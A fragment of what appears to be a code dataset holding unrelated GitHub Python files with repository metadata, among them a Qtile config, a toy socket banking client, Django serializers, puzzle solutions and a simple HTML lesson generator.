)\n","repo_name":"DrownFish19/PaddleXDE","sub_path":"paddlexde/utils/sde_settings.py","file_name":"sde_settings.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"33638472355","text":"from datetime import date \n\narchivo = open(\"repaso/M2/nacidos.csv\")\nl = archivo.readlines()\naP = 1998\nl.pop(0)\n\nfor personas in l:\n pC = personas.find(\",\")\n aN = int(personas[pC+1:pC+5])\n mN = int(personas[pC+6:pC+8])\n dN = int(personas[pC+9:pC+11])\n fechaNac = date(aN,mN, dN)\n veranoInicio = date(aP-1, 12, 21)\n veranoFin = date(aP, 3, 20)\n if veranoInicio <= fechaNac <= veranoFin:\n print(personas[:-1])\n","repo_name":"pablokan/22prog1","sub_path":"repaso/M2/pr8.py","file_name":"pr8.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74834036273","text":"import argparse\n\nimport pytest\nfrom support import timing\n\n\ndef compute(s):\n schedule = [x for x in s.splitlines()[1].split(\",\")]\n bus_ids = [int(x) for x in schedule if x != \"x\"]\n (step, t) = bus_ids[0], 0\n for b in bus_ids[1:]:\n while (t + schedule.index(str(b))) % b:\n t += step\n step *= b\n return t\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (\"\"\"123\n7,13,x,x,59,x,31,19\"\"\", 1068781),\n (\"\"\"123\n17,x,13,19\"\"\", 3417),\n (\"\"\"234\n1789,37,47,1889\"\"\", 1202161486),\n ),\n)\ndef test(input_s, expected):\n assert compute(input_s) == expected\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file')\n args = parser.parse_args()\n\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"itallix/advent-of-code-2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22741683324","text":"from utils.custom_context import MyContext\nfrom ..settings.get_setting import get_setting\nfrom ..errors import NotManager, NoGiveawayPermissions\nfrom bot import MetroBot\n\nimport discord\nfrom discord.ext import commands\n\n\ndef giveaway_manager_check():\n async def predicate(ctx: MyContext):\n\n manager = await get_setting(ctx.bot, 'manager', ctx.guild.id)\n\n role = ctx.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not ctx.author.guild_permissions.manage_guild:\n raise NoGiveawayPermissions(f'You need `Manage Guild` permissions to use this.')\n else:\n if not role in ctx.author.roles and not ctx.author.guild_permissions.manage_guild:\n raise NotManager(f'You need to be a giveaway manager (<@&{manager}>) to use this.')\n return True\n return commands.check(predicate)\n\nasync def giveaway_manager_check_interaction(bot: MetroBot, interaction: discord.Interaction,):\n \"\"\"Check if `Interaction.user` is a giveaway manager.\"\"\"\n manager = await get_setting(bot, 'manager', interaction.guild_id)\n\n role = interaction.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need `Manage Guild` permissions to use this.', ephemeral=True)\n return False\n else:\n if not role in interaction.user.roles and not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need to be a giveaway manager (<@&{manager}>) to use this.', ephemeral=True)\n return False\n return True\n \n","repo_name":"dartmern/metro","sub_path":"cogs/giveaway_rewrite/checks/manager_check.py","file_name":"manager_check.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"24028963834","text":"mutated_bat = genMonster(\"Mutated Bat\", 307, 9829)\nmutated_bat.health(900)\nmutated_bat.type(\"blood\")\nmutated_bat.defense(armor=20, fire=1, earth=0, energy=1, ice=1, holy=1, death=0, physical=1, drown=0)\nmutated_bat.experience(615)\nmutated_bat.speed(245)\nmutated_bat.behavior(summonable=0, hostile=True, illusionable=False, convinceable=0, pushable=False, pushItems=True, pushCreatures=True, targetDistance=1, runOnHealth=300)\nmutated_bat.walkAround(energy=0, fire=0, poison=0)\nmutated_bat.immunity(paralyze=1, invisible=1, lifedrain=1, drunk=1)\nmutated_bat.voices(\"Shriiiiiek\")\nmutated_bat.melee(169, condition=CountdownCondition(CONDITION_POISON, 6), conditionChance=100)\nmutated_bat.loot( (2148, 100, 130), (\"star herb\", 5.0), (\"rusty armor\", 13.0, 2), (\"battle shield\", 7.75), (\"obsidian lance\", 7.0), (\"bat wing\", 7.75, 3), (\"mutated bat ear\", 5.0), (\"energy ring\", 1.0), (\"small amethyst\", 0.75, 2), (\"black pearl\", 1.75, 3), (\"batwing hat\", 0.0025), (\"mercenary sword\", 0.0025), (\"black shield\", 0.0025) )","repo_name":"VAPus/PyOT-Legacy","sub_path":"data/monsters/Mammals/Mutated/Mutated Bat.py","file_name":"Mutated Bat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"1638052124","text":"import sys\n\ni = 0\nnomes={}\nfor s in sys.stdin:\n\tx = s.split()\n\tnomes[i] = []\n\tfor j in x:\n\t\tnomes[i].append(j)\n\ti+=1\n\nx = sorted(nomes.items(), key=lambda x: (len(x[1]),x[1])) # adiciona espacos nos nomes do meio\nfor i in range(len(x)):\n\tfor j in range(len(x[i][1])-1):\n\t\tx[i][1][j]+=' '\n\nl = len(x)\nfor y in x:\n\txx = y[1]\n\tfor i in range(len(xx)):\n\t\tsys.stdout.write(xx[i])\n\tprint\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"JoGomes19/LA2","sub_path":"Torneio1 - 20/nome.py","file_name":"nome.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7526432539","text":"######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom qtile_extras import widget\nfrom qtile_extras.widget.decorations import PowerLineDecoration\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\npowerline = {\n \"decorations\": [\n PowerLineDecoration(path=\"forward_slash\",\n size=7)\n ]\n}\n\nkeys = [\n Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n Key([mod], \"m\", lazy.window.toggle_maximize(), desc=\"Toggle maximize windows\"),\n Key([mod], \"space\", lazy.layout.next(), desc=\"Move window focus to other window\"),\n Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(), desc=\"Move window to the left\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(), desc=\"Move window to the right\"),\n Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n Key([mod, \"control\"], \"h\", lazy.layout.grow_left(), desc=\"Grow window to the left\"),\n Key([mod, \"control\"], \"l\", lazy.layout.grow_right(), desc=\"Grow window to the right\"),\n Key([mod, \"control\"], \"j\", lazy.layout.grow_down(), desc=\"Grow window down\"),\n Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n Key(\n [mod, \"shift\"],\n \"Return\",\n lazy.layout.toggle_split(),\n desc=\"Toggle between split and unsplit sides of stack\",\n ),\n Key([mod], \"Return\", lazy.spawn(\"kitty\"), desc=\"Launch terminal\"),\n Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n Key([mod, \"control\"], \"r\", lazy.reload_config(), desc=\"Reload the config\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown Qtile\"),\n Key([mod], \"r\", lazy.spawn(\"dmenu_run\"), desc=\"launch dmenu\"),\n Key([mod], \"s\", lazy.spawn(\"xfce4-settings-manager\"), desc=\"settings\"),\n\n #### APPS ####\n Key([mod], \"b\", lazy.spawn(\"brave\"), desc=\"Launches brave browser\"),\n Key([mod], \"c\", lazy.spawn(\"codium\"), desc=\"open vscode\"),\n Key([mod], \"q\", lazy.spawn(\"pcmanfm\"), desc=\"open file explorer\"),\n\n # Toggle keyboard layout\n Key([mod],\"f11\", lazy.widget[\"keyboardlayout\"].next_keyboard(), desc=\"Next keyboard layout\"),\n\n # Media\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer sset Master 2%-\"), desc=\"Lower Volume by 2%\"),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer sset Master 2%+\"), desc=\"Raise Volume by 2%\")\n]\n\ngroups = [Group(i) for i in \"1234567\"]\n\nfor i in groups:\n keys.extend(\n [\n Key(\n [mod],\n i.name,\n lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n ]\n )\n\nlayouts = [\n layout.Tile(\n margin = 12,\n border_focus=\"51E0F0\",\n border_width=2),\n]\n\nwidget_defaults = dict(\n font=\"sans\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n wallpaper=\"/home/noisefuck/Pictures/blue1.jpeg\",\n wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(font=\"sans Bold\",\n this_current_screen_border=\"51E0F0\",\n border_width=20),\n widget.Prompt(),\n widget.WindowName(foreground=\"51E0F0\",\n font=\"sans Bold\"),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Systray(),\n widget.Battery(background=[\"1F1F1F\"], # Just to create the last arrow effect\n foreground=\"131313\",\n fontsize=0.1,\n **powerline),\n widget.CheckUpdates(distro='Arch_checkupdates',\n update_interval=1800,\n display_format=\"🗘 : {updates}\",\n no_update_string=\"🗘 : 0\",\n font=\"sans Bold\",\n colour_no_updates=\"FFFFFF\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n **powerline),\n widget.CPU(format=\"ï’¼ {freq_current}GHz {load_percent}%\",\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Memory(measure_mem='G',\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Net(interface=\"enp8s0\",\n format='↑{up} ↓{down}',\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Clock(format=\"%d-%m %a %I:%M %p\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.PulseVolume(foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.KeyboardLayout(configured_keyboards=['us','gr'],\n foreground=\"FFFFFF\",\n font=\"sans Bold\",\n background=\"51E0F0\",\n **powerline),\n ],\n 22, background=[\"1F1F1F\"],\n ),\n ),\n]\n\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\nauto_minimize = True\n\nwl_input_rules = None\n\nwmname = \"LG3D\"\n\n######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n","repo_name":"NoizCode/config","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73918520755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'Yuanqin Lu'\n\nclass Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n length = len(nums)\n left, right = 0, length-1\n while left <= right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return True\n while left < mid and nums[left] == nums[mid]:\n left += 1\n if nums[left] <= nums[mid]:\n if nums[left] <= target < nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return False\n\n","repo_name":"lisabug/leetcode","sub_path":"Python/081_search_in_rotated_sorted_array_II.py","file_name":"081_search_in_rotated_sorted_array_II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70158530034","text":"from socket import *\r\nimport PySimpleGUI as sg\r\nfrom time import sleep\r\n\r\n\r\nhost = gethostbyname(gethostname())\r\nport = 50000\r\n\r\n#conexão com o servidor\r\n\r\nclient = socket(AF_INET, SOCK_STREAM)\r\nclient.connect((host, port))\r\n\r\n#layout\r\n\r\nsoma = 0\r\nsaldo = 500\r\nfalha = 0\r\nopcao = 0\r\n\r\n\r\ndef menu():\r\n global opcao, saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Clique na opção desejada:', size = (20, 2), font=16)],\r\n [sg.Button('Depositar', size = (30, 1), font=16)],\r\n [sg.Button('Sacar', size=(30, 1), font=16)],\r\n [sg.Button('Ver saldo', size=(30, 1), font=16)],\r\n [sg.Button('Sair')]\r\n ]\r\n\r\n menu = sg.Window('Eagle Bank', layout=layout, finalize= True)\r\n\r\n while True:\r\n eventos, valores = menu.read()\r\n if eventos == 'Sair' or sg.WINDOW_CLOSED:\r\n sg.popup('Finalizando...')\r\n break\r\n if eventos == 'Ver saldo':\r\n saldo = float(saldo)\r\n sg.popup(f'Seu saldo atual é: R${saldo:.2f}')\r\n if eventos == 'Depositar':\r\n opcao = 1\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n depositar()\r\n menu.un_hide()\r\n if eventos == 'Sacar':\r\n opcao = 2\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n sacar()\r\n menu.un_hide()\r\n\r\n\r\n menu.close()\r\n\r\n\r\ndef login():\r\n global soma\r\n sg.theme('DarkGrey2')\r\n layout = [\r\n [sg.Text('CPF', size = (11,1), font = 16)],\r\n [sg.InputText(key='login', font=10)],\r\n [sg.Text('Senha', size = (11, 1), font = 16)],\r\n [sg.InputText(key='senha', password_char= '*', font=10)],\r\n [sg.Button('Entrar'), sg.Button('Sair')]\r\n ]\r\n login = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = login.read()\r\n if eventos == 'Sair':\r\n sg.popup('Encerrando.')\r\n null = '0'\r\n client.send(null.encode())\r\n client.send(null.encode())\r\n break\r\n if eventos == 'Entrar':\r\n username = valores['login']\r\n password = valores['senha']\r\n client.send(username.encode())\r\n client.send(password.encode())\r\n msg = client.recv(1024).decode()\r\n if msg == 'Logado com sucesso':\r\n sg.popup('Autenticação concluída!')\r\n login.hide()\r\n menu()\r\n break\r\n elif msg != 'Logado com sucesso':\r\n sg.popup('Credenciais incorretas!')\r\n soma = soma + 1\r\n if soma == 3:\r\n sg.popup('Número de tentativas excedido. \\n Finalizando...')\r\n sleep(1.5)\r\n client.close()\r\n break\r\n login.close()\r\n\r\n\r\ndef depositar():\r\n global saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser depositado: ', size=(16,1), font=16)],\r\n [sg.InputText(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('Voltar')],\r\n ]\r\n\r\n depositar = sg.Window('Eagle Bank', layout=layout, finalize = True)\r\n\r\n while True:\r\n eventos, valores = depositar.read()\r\n if 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n valor = client.recv(1024).decode()\r\n valor = float(valor)\r\n saldo = valor\r\n sg.popup(f'Valor em conta atualizado: R${valor:.2f}')\r\n break\r\n depositar.close()\r\n\r\n\r\ndef sacar():\r\n global saldo, valor\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser sacado: ', size=(10,1), font=16)],\r\n [sg.Input(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('voltar')]\r\n ]\r\n\r\n sacar = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = sacar.read()\r\n if eventos == 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n print(saldo)\r\n saldo = client.recv(1024).decode()\r\n print(saldo)\r\n saldo = float(saldo)\r\n print(saldo)\r\n sg.popup(f'Seu saldo atualizado é de R${saldo}')\r\n break\r\n sacar.close()\r\n\r\n\r\n#criar um bloco de leitura de eventos\r\nlogin()\r\n\r\n","repo_name":"Ekaly/vscode","sub_path":"Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3318258404","text":"from django.urls import path\nfrom .views import AddStudentView, DetectionView, UpdateStudentImageView, DeleteStudentView, TrainView\n\nurlpatterns = [\n path('create-student', AddStudentView.as_view()),\n path('update-student-image', UpdateStudentImageView.as_view()),\n path('delete-student', DeleteStudentView.as_view()),\n path('train', TrainView.as_view()),\n path('detect', DetectionView.as_view())\n]\n","repo_name":"ruizhiwang11/face_reco_attendence_system","sub_path":"backend/face_reco_attendence_system/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36926069312","text":"############################\n# LESSON MAKER FOR STUYCCC #\n############################\n\n########## The lesson maker syntax ##########\n#\n# First line should be lesson title\n# Text without preceding formatter will be treated as plaintext in a

    tag\n# A blank line will be treated as a
    tag\n#\n# Open an ordered list with \"!!olist!!\"\n# Close an ordered list with \"!!endolist!!\"\n#\n# Open an unordered list with \"!!ulist!!\"\n# Close an unordered list with \"!!endulist!!\"\n#\n# Add an image with \"image()\" --> absolute dir, not relative\n#\n# Add a link with \"a[]()\"\n#\n# Add your own custom html between \"!!html!!\" and \"!!endhtml!!\"\n#\n# start a heading with !!h!!. It will be one line\n#\n# <, >, &, and TABs will automatically be replaced with their html equivalents\n#\n# For spacing, use !!breaks!!, being the number of breaks you want\n#\n# others shall be added l8r\n#\n#############################################\n\nimport re\n\ndef go():\n #take filename input and read it\n f = input(\"Input filename: \")\n straw = open(f, 'r')\n pretext = straw.read()\n straw.close()\n\n #start html file\n html = \"\"\n\n #replace >, <, &, and TABs\n pretext = pretext.replace('&', '&')\n pretext = pretext.replace('\\t', ' ')\n pretext = pretext.replace('<', '<')\n pretext = pretext.replace('>', '>')\n\n #fill in html\n pretext = pretext.split('\\n')\n\n html += '

    ' + pretext[0] + '

    \\n' #adds title\n\n in_list = False #will be true if in olist --> precedes every element with
  • \n in_html = False #will be true if user is adding custom html --> will ignore all steps and paste users html in file\n\n for i in pretext[1:]:\n if i[:10] == '!!breaks!!':\n num = int(i[10:])\n html += '
    \\n' * num\n continue\n if in_html:\n if i != '!!endhtml!!':\n html += i.replace('>', '>').replace('<', '<').replace(' ', '\\t').replace('&', '&') + '\\n'\n else:\n in_html = False\n continue\n if in_list:\n if i != '!!endulist!!' and i != '!!endolist!!':\n html += '
  • \\n'\n else:\n if i == '!!endulist!!':\n html += '\\n\\n'\n else:\n html += '\\n\\n'\n in_list = False\n continue\n if i == '':\n html += '
    \\n'\n continue\n\n #check for list\n x = re.match(r'!![a-zA-Z]*!!', i)\n if x != None:\n found = x.group()\n\n #ordered lists\n if found.strip('!') == 'olist':\n html += '\\n
      \\n'\n in_list = True\n\n #unordered lists\n elif found.strip('!') == 'ulist':\n html += '\\n
        \\n'\n in_list = True\n\n #custom html\n elif found.strip('!') == 'html':\n in_html = True\n\n #anything else\n else:\n html += '

        ' + found + '

        \\n'\n continue\n\n #check for img url\n x = re.match(r'image\\(https?://.*\\)', i)\n if x != None:\n html += '\\n'\n continue\n\n #check for hyperlink\n x = re.match(r'a\\[.*\\]\\(https*://.*\\)', i)\n if x != None:\n full = x.group()\n inner_text = re.search(r'\\[.*\\]', full).group()[1:-1]\n url = re.search(r'\\(https*://.*\\)', full).group()[1:-1]\n html += '

        ' + inner_text + '

        \\n'\n continue\n\n #check for heading\n x = re.search(r'!!h\\d!!', i)\n if x != None and x.end() == 6:\n tier = x.group().strip('!h')\n html += '\\n' + i[6:] + '\\n\\n'\n continue\n\n\n #if nothing else worked\n html += '

        ' + i + '

        \\n'\n\n if in_list:\n html += '\\n'\n\n html += \"\"\n\n straw = open(f.rsplit('.', 1)[0] + '.html', 'w')\n straw.write(html)\n straw.close()\n\n print(\"Wrote to \" + f.rsplit('.', 1)[0] + \".html\")\n\n\ngo()\n","repo_name":"JoanChirinos/StuyCCC","sub_path":"Lessons/lessonMaker.py","file_name":"lessonMaker.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"24791638087","text":"import base64\n\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\nfrom recipes.models import (Favorite, Follow, Ingredient, IngredientInRecipe,\n Recipe, ShoppingCart, Tag, )\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom users.models import User\n\n\nclass Base64ImageField(serializers.ImageField):\n\n def to_internal_value(self, data):\n \"\"\"Преобразование ка��тинки\"\"\"\n\n if isinstance(data, str) and data.startswith('data:image'):\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n data = ContentFile(base64.b64decode(imgstr), name='photo.' + ext)\n\n return super().to_internal_value(data)\n\n\nclass TagSerializer(ModelSerializer):\n \"\"\"Вывод тэгов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug')\n\n\nclass IngredientSerializer(ModelSerializer):\n \"\"\"вывод ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit')\n\n\nclass UsersSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор выдачи информации о user.\n \"\"\"\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed'\n )\n\n def get_is_subscribed(self, obj):\n \"\"\"\n Проверка на подписку.\n \"\"\"\n user_me = self.context['request'].user\n if not user_me.is_authenticated:\n return False\n return user_me.follower.filter(author=obj).exists()\n\n\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\n id = serializers.ReadOnlyField(source='ingredient.id')\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit')\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass RecipeViewSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n author = UsersSerializer()\n ingredients = IngredientInRecipeSerializer(\n source='ingredient_list', many=True)\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n def get_is_favorited(self, obj):\n \"\"\"Проверка на добавление в избранное.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return Favorite.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n def get_is_in_shopping_cart(self, obj):\n \"\"\"проверка на наличие в корзине.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return ShoppingCart.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи рецепта(ов) с общей информацией.\n \"\"\"\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'name',\n 'image',\n 'cooking_time'\n )\n\n\nclass CreateIngredientsInRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для ингредиентов в рецептах\"\"\"\n\n id = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n @staticmethod\n def validate_amount(value):\n \"\"\"Валидация количества\"\"\"\n\n if value < 1:\n raise serializers.ValidationError(\n 'Количество ингредиента должно быть больше 0!'\n )\n return value\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'amount')\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Создание рецептов\"\"\"\n\n ingredients = CreateIngredientsInRecipeSerializer(many=True)\n tags = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Tag.objects.all()\n )\n image = Base64ImageField(use_url=True)\n\n class Meta:\n model = Recipe\n fields = ('ingredients', 'tags', 'name',\n 'image', 'text', 'cooking_time')\n\n def to_representation(self, instance):\n \"\"\"Представление модели\"\"\"\n\n serializer = RecipeViewSerializer(\n instance,\n context={\n 'request': self.context.get('request')\n }\n )\n return serializer.data\n\n def validate(self, data):\n \"\"\"Валидация ингредиентов\"\"\"\n\n ingredients = self.initial_data.get('ingredients')\n lst_ingredient = []\n\n for ingredient in ingredients:\n if ingredient['id'] in lst_ingredient:\n raise serializers.ValidationError(\n 'Ингредиенты должны быть уникальными!'\n )\n lst_ingredient.append(ingredient['id'])\n return data\n\n def recipe_create_or_update(self, instance, validated_data):\n \"\"\"\n Метод для создания или обновления ингредиентов и тегов.\n \"\"\"\n ingredients, tags = (\n validated_data.pop('ingredients'), validated_data.pop('tags')\n )\n for item in ingredients:\n cur_obj, _ = IngredientInRecipe.objects.get_or_create(\n recipe=instance,\n ingredient=get_object_or_404(Ingredient, pk=item['id']),\n amount=item['amount']\n )\n for item in tags:\n instance.tags.add(item)\n\n return instance\n\n def create(self, validated_data):\n raw_data = {\n 'ingredients': validated_data.pop('ingredients'),\n 'tags': validated_data.pop('tags')\n }\n recipe = Recipe.objects.create(**validated_data)\n return self.recipe_create_or_update(recipe, raw_data)\n\n def update(self, instance, validated_data):\n instance.ingredients.clear()\n instance.tags.clear()\n instance = self.recipe_create_or_update(instance, validated_data)\n return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи избранных рецептов.\n \"\"\"\n\n class Meta:\n model = Favorite\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if Favorite.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в избранном'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n\n\nclass FollowSerializer(UsersSerializer):\n \"\"\"\n Сериализатор для выдачи подписок.\n \"\"\"\n recipes_count = serializers.SerializerMethodField()\n recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count'\n )\n\n def get_recipes(self, author):\n \"\"\"\n При наличии в параметрах запроса recipes_limit происходит\n выдача среза списка с ингредиентами.\n \"\"\"\n request = self.context.get('request')\n recipes_limit = request.query_params.get('recipes_limit')\n if recipes_limit:\n return RecipeSerializer(\n Recipe.objects.filter(author=author)[:int(recipes_limit)],\n context={'queryset': request},\n many=True\n ).data\n return RecipeSerializer(\n Recipe.objects.filter(author=author),\n context={'queryset': request},\n many=True\n ).data\n\n def get_recipes_count(self, obj):\n \"\"\"\n Подсчет количества рецептов автора.\n \"\"\"\n return 